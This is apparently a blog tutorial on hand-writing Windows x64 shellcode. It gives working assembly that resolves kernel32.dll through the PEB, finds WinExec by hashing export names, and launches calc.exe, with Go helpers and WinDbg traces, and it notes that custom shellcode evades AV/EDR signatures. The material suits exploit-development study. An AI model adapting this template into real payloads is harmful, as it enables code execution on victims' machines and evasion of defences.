2. Windows x64 Shellcode Development intro
#x64 #shellcode #golang #asm
Introduction
Shellcode is a small piece of code written in assembly language that is used to perform a specific function in the context of a software exploit. The term "shellcode" comes from the idea that the code often opens a shell, providing an attacker with command-line access to a compromised system.
Shellcode is commonly associated with security exploits, especially in the field of cybersecurity and penetration testing. It is often injected into a vulnerable program's memory through various means, such as buffer overflows or other vulnerabilities, to take control of the program's execution flow.
The functionality of shellcode can vary widely, depending on the goals of the attacker. It might include actions like spawning a shell, downloading and executing malicious payloads, or performing other malicious activities.
It's important to note that while shellcode itself is not inherently malicious, it is commonly used as a component of exploits and attacks.
A common tool for generating shellcode is msfvenom. Any payload generated from this tool is heavily signatured by AV/EDR vendors. Being able to write custom shellcode is a great addition to the arsenal of any offensive security professional.
Assembly - Intel Syntax
Throughout this blog post I will be using Intel Syntax. I think it's much easier to read and write. It's also the default syntax for Windbg which is the debugger I will be using for testing my assembly code.
Syntax
Intel syntax follows this convention:
instruction destination, source;
So let's take a real example. The add instruction adds the value on the right to the value on the left and stores the result on the left.
add rax,1;
In this case, if rax held the value 2 before the instruction ran, it will hold the value 3 after execution.
Common ASM instructions
mov rax,1;
Moves the value 1 (decimal) into rax. Prefix the number with 0x for hex values
mov rax, qword ptr [r8];
Moves the qword stored at the address held in r8 into rax
add rax,1;
Adds 1 to rax
sub rax,1;
Subtracts 1 from rax
push rax;
Pushes the value of rax to the stack
pop rax;
Pops the value at the top of the stack into rax
call rax;
Calls the function at the address stored in rax
jmp rax;
Jumps to the address stored in rax
xor rax,rax;
logical xor, zeros the contents of rax
int3;
breakpoint
The above instructions are the most commonly used when we are writing shellcode. A few others will be used but they will be explained as we walk through the actual code.
Registers
The whole list of registers can be found on Microsoft's website. Let's have a quick look at how some of the registers will be used within the shellcode.
Let's take rax as an example.
rax
64-bit register
eax
32-bit register (lower 32 bits of rax)
ax
16-bit register (lower 16 bits of eax)
ah
8-bit register (higher 8 bits of ax)
al
8-bit register (lower 8 bits of ax)
Let's take r8 as another example
r8
64-bit register
r8d
32-bit register (lower 32 bits of r8)
r8w
16-bit register (lower 16 bits of r8d)
r8b
8-bit register (lower 8 bits of r8w)
d - double word
w - word
b - byte
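To make the aliasing concrete, here is a minimal Go sketch that extracts the same views from a 64-bit value with casts and shifts. The function name subRegisters and the sample value are made up for illustration; only the register layout comes from the tables above.

```go
package main

import "fmt"

// subRegisters returns the narrower views of a 64-bit register value,
// mirroring how eax, ax, ah and al alias the low bits of rax.
// (Hypothetical helper, for illustration only.)
func subRegisters(rax uint64) (eax uint32, ax uint16, ah, al uint8) {
	eax = uint32(rax)    // lower 32 bits of rax
	ax = uint16(rax)     // lower 16 bits of eax
	ah = uint8(rax >> 8) // higher 8 bits of ax
	al = uint8(rax)      // lower 8 bits of ax
	return
}

func main() {
	eax, ax, ah, al := subRegisters(0x1122334455667788)
	// prints: eax=0x55667788 ax=0x7788 ah=0x77 al=0x88
	fmt.Printf("eax=%#x ax=%#x ah=%#x al=%#x\n", eax, ax, ah, al)
}
```

The same masks apply to r8: r8d, r8w and r8b are the lower 32, 16 and 8 bits respectively.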
Shellcode template
A good template I found online when I was looking for one can be found here.
I am not a big fan of Python, so I ported the above script to Go. To make development and debugging easier, I also included the shellcode runner, which automatically launches and attaches Windbg Preview.
The ported code can be downloaded from my github page here. If you are more familiar with python you can use the original template from exploitdb and follow along. Only caveat is that you will have to write your own shellcode runner to execute the code.
Objective
With everything we have now in place, let's have a quick look at the code we are trying to execute in a higher level language.
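package main

import (
	"syscall"
	"unsafe"

	"golang.org/x/sys/windows"
)

func main() {
	// Load kernel32.dll and keep its module handle (errors ignored for brevity).
	hModule, _ := windows.LoadLibrary("kernel32.dll")
	// Resolve the address of WinExec inside kernel32.dll.
	winexecaddr, _ := windows.GetProcAddress(hModule, "WinExec")
	// Build a pointer to the null-terminated string "calc.exe".
	calcstring, _ := syscall.BytePtrFromString("calc.exe")
	// Call WinExec(lpCmdLine, uCmdShow) with uCmdShow = 1.
	syscall.SyscallN(
		winexecaddr,
		uintptr(unsafe.Pointer(calcstring)),
		0x1)
}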
From the above code we essentially have 4 statements we would like to turn into assembly.
windows.LoadLibrary: Load kernel32.dll and get its base address
windows.GetProcAddress: Get the procedure address of WinExec
syscall.BytePtrFromString: Get a pointer to the null-terminated string "calc.exe"
syscall.SyscallN: Call the WinExec function, passing the string pointer as the first argument and 1 as the second.
Shellcode
Finding kernel32.dll
As mentioned previously, the first step in developing our shellcode is to find the base address of kernel32.dll in memory. Kernel32.dll is always loaded into the process memory on creation.
To find the address we have to perform the following tasks.
From TEB we can get the address of the PEB
From PEB we can get the PEB_LDR_DATA
From PEB_LDR_DATA we can get InMemoryOrderModuleList
Walking InMemoryOrderModuleList gives us the entry for kernel32.dll and its base address
Let's walk through the assembly code in windbg to ensure we get the expected results. We start by adding a breakpoint (int3;) at the top of our shellcode.
"find_kernel32:",
" int3;",
" xor rdx, rdx;",
" mov rax, gs:[rdx+0x60];", // RAX = ProcessEnvironmentBlock member of the TEB, which is the PEB address
" mov rsi,[rax+0x18];", // RSI = Ldr member of the PEB, which is the address of the _PEB_LDR_DATA structure
" mov rsi,[rsi + 0x20];", // RSI = InMemoryOrderModuleList.Flink, the list entry of the current executable
" mov r9, [rsi];", // Follow Flink from the current executable: R9 = list entry of ntdll.dll
" mov r9, [r9];", // Follow Flink from ntdll.dll: R9 = list entry of kernel32.dll
" mov r9, [r9+0x20];", // R9 = DllBase of kernel32.dll
" jmp call_winexec;",
Get the address of the PEB structure from TEB
Lines 3-4: On x64 Windows, the gs register points to the Thread Environment Block (TEB), which contains information about the current thread. Line 3 zeros rdx so that line 4 can read the PEB pointer from gs:[rdx+0x60].
In Windbg we can view the structure using the following command
dt nt!_TEB @$teb

We can see that the PEB is located at offset 0x60 from the beginning of the TEB. Once we step over the following instruction we should get the address of PEB in rax
mov rax,qword ptr gs:[rdx+60h]
A quick sanity check confirms that the value in the rax register matches the one from the TEB.
0:001> r rax
rax=00000009d0110000
From PEB we can get the PEB_LDR_DATA
Line 5: We have the value of PEB in RAX and we now try to get the address of the PEB_LDR_DATA.
We can then use the following command to view the PEB Structure and identify the offset for LDR
dt nt!_PEB 00000009d0110000

As we can see from above the offset to Ldr is 0x18. Let's step over line 5 that has the following instruction to see if we get the address of PEB_LDR_DATA in the RSI register
" mov rsi,[rax+0x18];"
Let's do a quick sanity check using windbg
0:001> p
0000016b`78f8000d 488b7620 mov rsi,qword ptr [rsi+20h] ds:00007ffc`22ff6400=0000016b52262c80
0:001> r rsi
rsi=00007ffc22ff63e0
Great, we now have the address of the struct in rsi
We can get InMemoryOrderModuleList from PEB_LDR_DATA
Line 6: We now have the PEB_LDR_DATA address in rsi and we want to get the value of InMemoryOrderModuleList to rsi. Let's view the struct in windbg once again to make sure we have the correct offset in our shellcode.

The offset seems to be correct in our code
" mov rsi,[rsi + 0x20];"
Let's step over in our code to see if we get the right value in rsi.
0:001> p
0000016b`78f80011 4c8b0e mov r9,qword ptr [rsi] ds:0000016b`52262c80=0000016b52262ae0
0:001> r rsi
rsi=0000016b52262c80
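The pointer chain we just stepped through can be summarised in a small Go simulation. This is only a sketch: the memory map is a toy stand-in for process memory, the TEB address 0x1000 is made up, and the remaining values are the ones from the debugger output above.

```go
package main

import "fmt"

// Offsets used by the find_kernel32 listing (x64).
const (
	offTebPeb          = 0x60 // TEB.ProcessEnvironmentBlock
	offPebLdr          = 0x18 // PEB.Ldr
	offLdrInMemoryList = 0x20 // PEB_LDR_DATA.InMemoryOrderModuleList (Flink)
)

// memory is a toy stand-in for process memory: address -> qword stored there.
type memory map[uint64]uint64

// firstModuleLink follows TEB -> PEB -> Ldr -> InMemoryOrderModuleList.Flink,
// which is what the first three mov instructions do.
func firstModuleLink(mem memory, teb uint64) uint64 {
	peb := mem[teb+offTebPeb]
	ldr := mem[peb+offPebLdr]
	return mem[ldr+offLdrInMemoryList]
}

func main() {
	const teb = 0x1000 // hypothetical TEB address, for illustration only
	mem := memory{
		teb + offTebPeb:                         0x00000009d0110000, // PEB, as seen in rax
		0x00000009d0110000 + offPebLdr:          0x00007ffc22ff63e0, // PEB_LDR_DATA
		0x00007ffc22ff63e0 + offLdrInMemoryList: 0x0000016b52262c80, // first list entry
	}
	// prints: rsi=0000016b52262c80
	fmt.Printf("rsi=%016x\n", firstModuleLink(mem, teb))
}
```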
Walk the linked list
Kernel32 comes after the current executable and ntdll. So moving forward twice should give us the _LDR_DATA_TABLE_ENTRY of kernel32. Let's confirm this.
First Entry ks.exe:
dt _LDR_DATA_TABLE_ENTRY 0x16b52262c80-0x10

Second entry ntdll.dll

Third entry kernel32.dll

We can see that DllBase is at offset 0x30 from the beginning of the structure. The list pointer in r9 points at InMemoryOrderLinks, which sits 0x10 into the structure (that is why we subtracted 0x10 above to reach its beginning). From r9 we therefore only need to add 0x20 (0x30 - 0x10) to get the DllBase value.
" mov r9, [r9+0x20];",
Let's confirm that after stepping over line 9 in our code the register r9 will hold the kernel32.dll base address.

Awesome. With the address of kernel32.dll in r9 we can now proceed to get the address of WinExec.
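The 0x20 offset used to reach DllBase can be double-checked with a small Go sketch. The struct below mirrors only the first four fields of _LDR_DATA_TABLE_ENTRY on x64; the type names are my own and pointers are modelled as uint64 so the layout is the same on any platform.

```go
package main

import (
	"fmt"
	"unsafe"
)

// listEntry mirrors LIST_ENTRY on x64: two 8-byte pointers (Flink, Blink).
type listEntry struct {
	Flink, Blink uint64
}

// ldrEntryHead mirrors only the first fields of _LDR_DATA_TABLE_ENTRY (x64).
// Illustrative type, not a complete definition.
type ldrEntryHead struct {
	InLoadOrderLinks           listEntry // offset 0x00
	InMemoryOrderLinks         listEntry // offset 0x10
	InInitializationOrderLinks listEntry // offset 0x20
	DllBase                    uint64    // offset 0x30
}

// dllBaseFromLink returns the distance from InMemoryOrderLinks to DllBase.
func dllBaseFromLink() uintptr {
	var e ldrEntryHead
	return unsafe.Offsetof(e.DllBase) - unsafe.Offsetof(e.InMemoryOrderLinks)
}

func main() {
	// prints: DllBase is at link+0x20
	fmt.Printf("DllBase is at link+%#x\n", dllBaseFromLink())
}
```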
GetProcAddress
The next step in our shellcode is to create a function that walks through the export directory of any given dll (base address) and returns the absolute address of the requested function. Although in this example we will only call it once, in larger, more real-world scenarios we will most likely have to call this function multiple times.
"parse_module:", // Parsing DLL file in memory
" mov ecx, dword ptr [r9 + 0x3c];", // R9 stores the base address of the module, get the NT header offset
" xor r15, r15;",
" mov r15b, 0x88;", // Offset to Export Directory
" add r15, r9;",
" add r15, rcx;",
" mov r15d, dword ptr [r15];", // Get the RVA of the export directory
" add r15, r9;", // R15 stores the VMA of the export directory
" mov ecx, dword ptr [r15 + 0x18];", // ECX stores the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;", // R14 stores the VMA of ENPT
"search_function:", // Search for a given function
" jrcxz not_found;", // If RCX is 0, the given function is not found
" dec ecx;", // Decrease index by 1
" xor rsi, rsi;",
" mov esi, [r14 + rcx*4];", // RVA of function name string
" add rsi, r9;", // RSI points to function name string
"function_hashing:", // Hash function name function
" xor rax, rax;",
" xor rdx, rdx;",
" cld;", // Clear DF flag
"iteration:", // Iterate over each byte
" lodsb;", // Copy the next byte of RSI to Al
" test al, al;", // If reaching the end of the string
" jz compare_hash;", // Compare hash
" ror edx, 0x0d;", // Part of hash algorithm
" add edx, eax;", // Part of hash algorithm
" jmp iteration;", // Next byte
"compare_hash:", // Compare hash
" cmp edx, r8d;",
" jnz search_function;", // If not equal, search the previous function (index decreases)
" mov r10d, [r15 + 0x24];", // Ordinal table RVA
" add r10, r9;", // Ordinal table VMA
" movzx ecx, word ptr [r10 + 2*rcx];", // Ordinal value -1
" mov r11d, [r15 + 0x1c];", // RVA of EAT
" add r11, r9;", // VMA of EAT
" mov eax, [r11 + 4*rcx];", // RAX stores RVA of the function
" add rax, r9;", // RAX stores VMA of the function
" ret;",
"not_found:",
" ret;",
Let's break the code down into smaller pieces to understand exactly what's happening.
parse_module
"parse_module:", // Parsing DLL file in memory
" mov ecx, dword ptr [r9 + 0x3c];", // R9 stores the base address of the module, get the NT header offset
" xor r15, r15;",
" mov r15b, 0x88;", // Offset to Export Directory
" add r15, r9;",
" add r15, rcx;",
" mov r15d, dword ptr [r15];", // Get the RVA of the export directory
" add r15, r9;", // R15 stores the VMA of the export directory
" mov ecx, dword ptr [r15 + 0x18];", // ECX stores the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;", // R14 stores the VMA of ENPT
The parse_module function expects 2 values from the caller:
R9 -> should hold the base address of the dll
R8d -> should have the hash of the function (more on this later)
Line 2: The offset value to the beginning of the nt header is moved to ecx
PE-bear is an excellent tool that can be used to cross check if the values we see in windbg are indeed the right ones.

Let's step over the code in line 2 to make sure we are getting the correct result. The value we expect to see in ecx is E8.
0:010> t
000001f8`6d17001d 418b493c mov ecx,dword ptr [r9+3Ch] ds:00007ffc`2127003c=000000e8
0:010> p
000001f8`6d170021 4d31ff xor r15,r15
0:010> r ecx
ecx=e8
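Lines 3-6: These lines perform the following calculation. The result is the address of the export directory entry in the data directory, and line 7 then reads the export directory RVA from it.
NtHeader = DllBase + 0xE8
Export Directory entry = NtHeader + 0x88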
0:010> ?e8+0x88
Evaluate expression: 368 = 00000000`00000170
From a quick calculation we can see that the export directory entry is at offset 0x170 from the base address. Let's check in PE-bear whether that offset points to the export directory.

We can see that the offset 0x170 points to the RVA of the export directory.
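The constant 0x88 is not arbitrary. As a rough sketch, it can be broken down into the sizes of the structures that sit between the start of the NT headers and the first data directory entry in a 64-bit image. The constant and function names below are my own.

```go
package main

import "fmt"

const (
	peSignatureSize      = 4    // "PE\0\0" signature
	fileHeaderSize       = 20   // IMAGE_FILE_HEADER
	dataDirOffsetInOpt64 = 0x70 // offset of DataDirectory inside IMAGE_OPTIONAL_HEADER64
)

// exportDirEntryOffset returns the offset, from the module base, of the
// export directory's data directory entry (its first dword is the RVA).
// eLfanew is the value read from offset 0x3c of the module.
func exportDirEntryOffset(eLfanew uint32) uint32 {
	return eLfanew + peSignatureSize + fileHeaderSize + dataDirOffsetInOpt64
}

func main() {
	// 0xe8 is the e_lfanew value we saw in ecx; prints: 0x170
	fmt.Printf("%#x\n", exportDirEntryOffset(0xe8))
}
```

Note that this breakdown only holds for 64-bit (PE32+) images, which is what the shellcode in this post targets.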
Let's walk over the following instruction in windbg to ensure that r15 holds the RVA value we expect to see
" mov r15d, dword ptr [r15];",
0:010> r r15
r15=000000000009e750
We can now add r9 which holds the dllBase address to calculate the absolute address of the Export directory.
" add r15, r9;",

In windbg we can confirm that we are indeed pointing to the right location by viewing the first two double words.
0:010> r r15; dd r15 L2
r15=00007ffc2130e750
00007ffc`2130e750 00000000 2e35230e
We can see the value of Characteristics (00000000) and ReproChecksum (2e35230e).
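Every RVA in the export directory is turned into an absolute address the same way, by adding the module base. A minimal Go sketch of that arithmetic follows; the base address is the one implied by the ds: address in the debugger output above (r9+0x3c = 00007ffc`2127003c), and the function name rvaToVA is my own.

```go
package main

import "fmt"

// rvaToVA converts a relative virtual address into an absolute one,
// which is what every "add <reg>, r9" in parse_module does.
func rvaToVA(base uint64, rva uint32) uint64 {
	return base + uint64(rva)
}

func main() {
	const base = 0x00007ffc21270000 // kernel32.dll base in this debugging session
	// prints: r15=00007ffc2130e750
	fmt.Printf("r15=%016x\n", rvaToVA(base, 0x9e750))
}
```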
" mov ecx, dword ptr [r15 + 0x18];", // ECX stores the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;", // R14 stores the VMA of ENPT
The last 3 lines store the number of function names in ecx and the address of names in r14.
0:010> r ecx
ecx=687
0:010> dd r14
00007ffc`21310194 000a28cb 000a2904 000a2937 000a2946
00007ffc`213101a4 000a295b 000a2980 000a2989 000a2992
00007ffc`213101b4 000a29a3 000a29b4 000a29f9 000a2a1f
A quick look in PE-bear reveals that we have the right values in both ecx, and r14. We can see that the first value at r14 is the same as the first Name RVA below.

search_function
"search_function:", // Search for a given function
" jrcxz not_found;", // If RCX is 0, the given function is not found
" dec ecx;", // Decrease index by 1
" xor rsi, rsi;",
" mov esi, [r14 + rcx*4];", // RVA of function name string
" add rsi, r9;", // RSI points to function name string
.
.
.
"not_found:",
" ret;",
The functionality of this code is fairly simple.
Line 2: Checks whether rcx is 0 and, if it is, jumps to not_found on line 10, which returns without resolving an address. When the counter reaches 0 it means that our shellcode went through the whole export name list without finding the requested function.
Line 3: Decrements ecx by 1 on every iteration
Line 4: Zeros rsi
Line 5: Moves the RVA of the function name at index ecx into esi. On the first iteration this is the last name in the table
Line 6: Adds the base address to the RVA to get the absolute address of the name string in rsi
The second time the loop reaches this point this is the output from Windbg
000001f8`6d170049 4c01ce add rsi,r9
0:010> r rsi
rsi=00000000000ad02a
0:010> p
000001f8`6d17004c 4831c0 xor rax,rax
0:010> db rsi
00007ffc`2131d02a 75 61 77 5f 77 63 73 6c-65 6e 00 75 61 77 5f 77 uaw_wcslen.uaw_w
00007ffc`2131d03a 63 73 72 63 68 72 00 00-00 00 f0 f0 0a 00 00 00 csrchr..........
It matches the exported functions from PE-bear

function_hashing
The shellcode author in this case uses a smart algorithm that generates a hash from the function name and then compares it with the hash we provide, so the function name never has to be stored in the shellcode as a string. The caveat is that we have to write a piece of code to calculate that hash for us.
"function_hashing:", // Hash function name function
" xor rax, rax;",
" xor rdx, rdx;",
" cld;", // Clear DF flag
"iteration:", // Iterate over each byte
" lodsb;", // Copy the next byte of RSI to Al
" test al, al;", // If reaching the end of the string
" jz compare_hash;", // Compare hash
" ror edx, 0x0d;", // Part of hash algorithm
" add edx, eax;", // Part of hash algorithm
" jmp iteration;", // Next byte
Lines 1-4: Zero rax and rdx and clear the DF flag, so that lodsb moves forward through the string
The iteration code is where the hashing happens.
Line 6: lodsb loads the byte at the address pointed to by rsi into the lowest byte of rax (al) and advances rsi by one
Lines 7-8: Check whether the byte is 0, which indicates the end of the string, and if so jump to compare_hash
Line 9: The instruction ror edx, 0x0d performs a "rotate right" operation on the contents of the edx register. In this case, the rotation is by 13 bits (0x0d in hexadecimal is 13 in decimal).
Imagine edx could only hold 4 bits. Here is an example of the ror effect after rotating right 1 bit.
edx = 0101
ror edx, 0x01
edx = 1010
Line 10: Adds eax to edx
Line 11: Loops to the next byte
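If the rotation is hard to picture, the following Go sketch reproduces both the 4-bit toy example and the real 32-bit rotate. The helper names ror4 and ror32 are my own; bits.RotateLeft32 with a negative count is the standard library's way of rotating right.

```go
package main

import (
	"fmt"
	"math/bits"
)

// ror4 rotates a 4-bit value right by n bits, matching the toy example.
func ror4(v uint8, n uint) uint8 {
	v &= 0xf
	n %= 4
	return ((v >> n) | (v << (4 - n))) & 0xf
}

// ror32 rotates a 32-bit value right by n bits, like "ror edx, n".
func ror32(v uint32, n int) uint32 {
	return bits.RotateLeft32(v, -n)
}

func main() {
	fmt.Printf("%04b\n", ror4(0b0101, 1)) // prints: 1010
	fmt.Printf("%#x\n", ror32(1, 13))     // prints: 0x80000

	// First two hashing rounds for the name "Wi": 'W' = 0x57, 'i' = 0x69.
	h := ror32(0, 13) + 0x57
	h = ror32(h, 13) + 0x69
	fmt.Printf("%#x\n", h) // prints: 0x2b80069
}
```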
compare_hash
"compare_hash:", // Compare hash
" cmp edx, r8d;",
" jnz search_function;", // If not equal, search the previous function (index decreases)
" mov r10d, [r15 + 0x24];", // Ordinal table RVA
" add r10, r9;", // Ordinal table VMA
" movzx ecx, word ptr [r10 + 2*rcx];", // Ordinal value -1
" mov r11d, [r15 + 0x1c];", // RVA of EAT
" add r11, r9;", // VMA of EAT
" mov eax, [r11 + 4*rcx];", // RAX stores RVA of the function
" add rax, r9;", // RAX stores VMA of the function
" ret;",
The last part of the code is where the actual comparison takes place with the provided hash. Our hash will be located in r8d.
Line 2: Compares calculated hash from the previous function with the one we provided
Line 3: If they are not equal it jumps back to our search_function loop to get the next entry.
Lines 4-11: Only execute if the provided and calculated hashes match
Line 4: r15 holds the address of the export directory. The offset 0x24 points to the AddressOfNameOrdinals

000001f8`6d170064 458b5724 mov r10d,dword ptr [r15+24h] ds:00007ffc`2130e774=000a1bb0
0:010> p
000001f8`6d170068 4d01ca add r10,r9
0:010> r r10
r10=00000000000a1bb0
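Line 5: Adds the base address to the RVA to get the absolute address of AddressOfNameOrdinals
Line 6: Loads the entry of the ordinal table that belongs to the matched name into ecx. This value is the index into the function address table, and it is one less than the ordinal of the function we are after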

0:010> r ecx
ecx=638
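As we can see, the value in ecx (638) is the ordinal listed for WideCharToMultiByte, the entry just above the one we want.
The ordinal value of WinExec is 639. The ordinal table stores values relative to the Base field of the export directory, which is why ecx is one less.
Lines 7-8: Get the absolute address of the table that holds the addresses of functions. Its entries are the values we need in order to call a function.
Line 9: Gets the RVA of WinExec from the address of functions table into eax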
0:010> r eax
eax=68660
Comparing with the previous screenshot we can see that it's a match
Line 10: We add the base address and we have the function in the rax register ready to be called as needed.
Helper code for hash calculation
If you made it to this point, you are probably wondering how you can calculate the hash and provide it to the assembly code.
The following code will calculate and print the hash for us:
package main

import (
	"fmt"
	"math/bits"
)

func main() {
	funcName := "WinExec"
	fmt.Printf("Function Name: %s , Function Hash: 0x%x\n", funcName, HashCalculator(funcName))
}

// HashCalculator returns the hash of funcName using the same
// rotate-right-13-and-add loop as the function_hashing assembly.
func HashCalculator(funcName string) uint32 {
	var hash uint32
	for _, b := range []byte(funcName) {
		// Rotating left by a negative count rotates right (ror edx, 0x0d).
		hash = bits.RotateLeft32(hash, -0x0d)
		hash += uint32(b)
	}
	return hash
}
Call the WinExec function
"call_winexec:",
" mov r8d, 0xe8afe98;", // WinExec Hash
" call parse_module;", // Search and obtain address of WinExec
" xor rcx, rcx;",
" push rcx;", // \0
" mov rcx, 0x6578652e636c6163;", // exe.clac
" push rcx;",
" lea rcx, [rsp];", // Address of the string as the 1st argument lpCmdLine
" xor rdx,rdx;",
" inc rdx;", // uCmdShow=1 as the 2nd argument
" sub rsp, 0x28;",
" call rax;", // WinExec
We now reach the end of our code.
Referring back to the original go code we need to get a pointer to a null terminated string, in this example a pointer to 'calc.exe' and then call the function.
Line 2: we can use the helper code to calculate the function hash:
Function Name: WinExec , Function Hash: 0xe8afe98
We then feed the value to r8d.
Line 3: We call the parse_module function. If everything went well, rax will hold the address of the function

Great, we now only have to pass the arguments to the function.
It's a good place to pause now and have a quick look at the x64 calling convention. When calling a function on x64 Windows, the first four arguments go into the registers rcx, rdx, r8 and r9, and all the rest go on the stack from right to left, so the last argument is pushed first. The caller also has to reserve 32 bytes of shadow space on the stack for the callee.
A great source of information is Microsoft's website.
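As a quick illustration of that rule, the following Go sketch maps the position of an integer or pointer argument to where the callee expects it at the call instruction. The function placeArgs is a made-up helper and it ignores floating point arguments, which use the xmm registers instead.

```go
package main

import "fmt"

// placeArgs returns, for n integer/pointer arguments, where each one lives
// at the moment of the call under the Windows x64 calling convention.
func placeArgs(n int) []string {
	regs := []string{"rcx", "rdx", "r8", "r9"}
	out := make([]string, 0, n)
	for i := 0; i < n; i++ {
		if i < len(regs) {
			out = append(out, regs[i])
			continue
		}
		// Stack arguments sit right above the 32 bytes (0x20) of shadow space.
		out = append(out, fmt.Sprintf("[rsp+%#x]", 0x20+8*(i-len(regs))))
	}
	return out
}

func main() {
	fmt.Println(placeArgs(2)) // WinExec takes two arguments; prints: [rcx rdx]
	fmt.Println(placeArgs(6)) // prints: [rcx rdx r8 r9 [rsp+0x20] [rsp+0x28]]
}
```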
With this knowledge let's pass the arguments to WinExec.
UINT WinExec(
[in] LPCSTR lpCmdLine,
[in] UINT uCmdShow
);
The WinExec definition from Microsoft states that the first argument should be a pointer to a null-terminated string.
Lines 4-8:
Line 4: zero -> rcx
Line 5: push 0 to the stack. This will act as the null termination
Line 6: The hex values of calc.exe are moved to rcx
To convert ascii to hex I am using this online converter https://www.rapidtables.com/convert/number/ascii-to-hex.html
calc.exe = 63 61 6C 63 2E 65 78 65 + 00
" mov rcx, 0x6578652e636c6163;", // exe.clac
Line 7: Pushes the string to the stack
Line 8: Gets a pointer to the string in the rcx register (first argument)
Lines 9-10: Zero rdx and increment it by 1, so uCmdShow = 1 (second argument)
Line 11: Reserves 0x28 bytes on the stack for the argument storage space (shadow space) and stack alignment
Line 12: Finally calling the function.
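Instead of an online converter, the immediate for line 6 can also be produced with a few lines of Go. This is a minimal sketch with a made-up helper name, packQword. It works because x64 is little-endian, so the first character of the string has to end up in the lowest byte of the register.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// packQword packs a string of up to 8 bytes into the 64-bit immediate that,
// once pushed to the stack, reads back as the original string.
func packQword(s string) (uint64, error) {
	if len(s) > 8 {
		return 0, fmt.Errorf("%q does not fit in one qword", s)
	}
	var buf [8]byte // shorter strings are padded with zero bytes
	copy(buf[:], s)
	return binary.LittleEndian.Uint64(buf[:]), nil
}

func main() {
	v, err := packQword("calc.exe")
	if err != nil {
		panic(err)
	}
	fmt.Printf("mov rcx, %#x;\n", v) // prints: mov rcx, 0x6578652e636c6163;
}
```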
0:010> r rcx,rdx
rcx=0000001ea51ff9d8 rdx=0000000000000001
0:010> da 0000001ea51ff9d8
0000001e`a51ff9d8 "calc.exe"
Just before calling the function this is what we see in rcx,rdx which is exactly what we expect.
Stepping over the function should launch a calc.exe process

The whole shellcode template can be found here.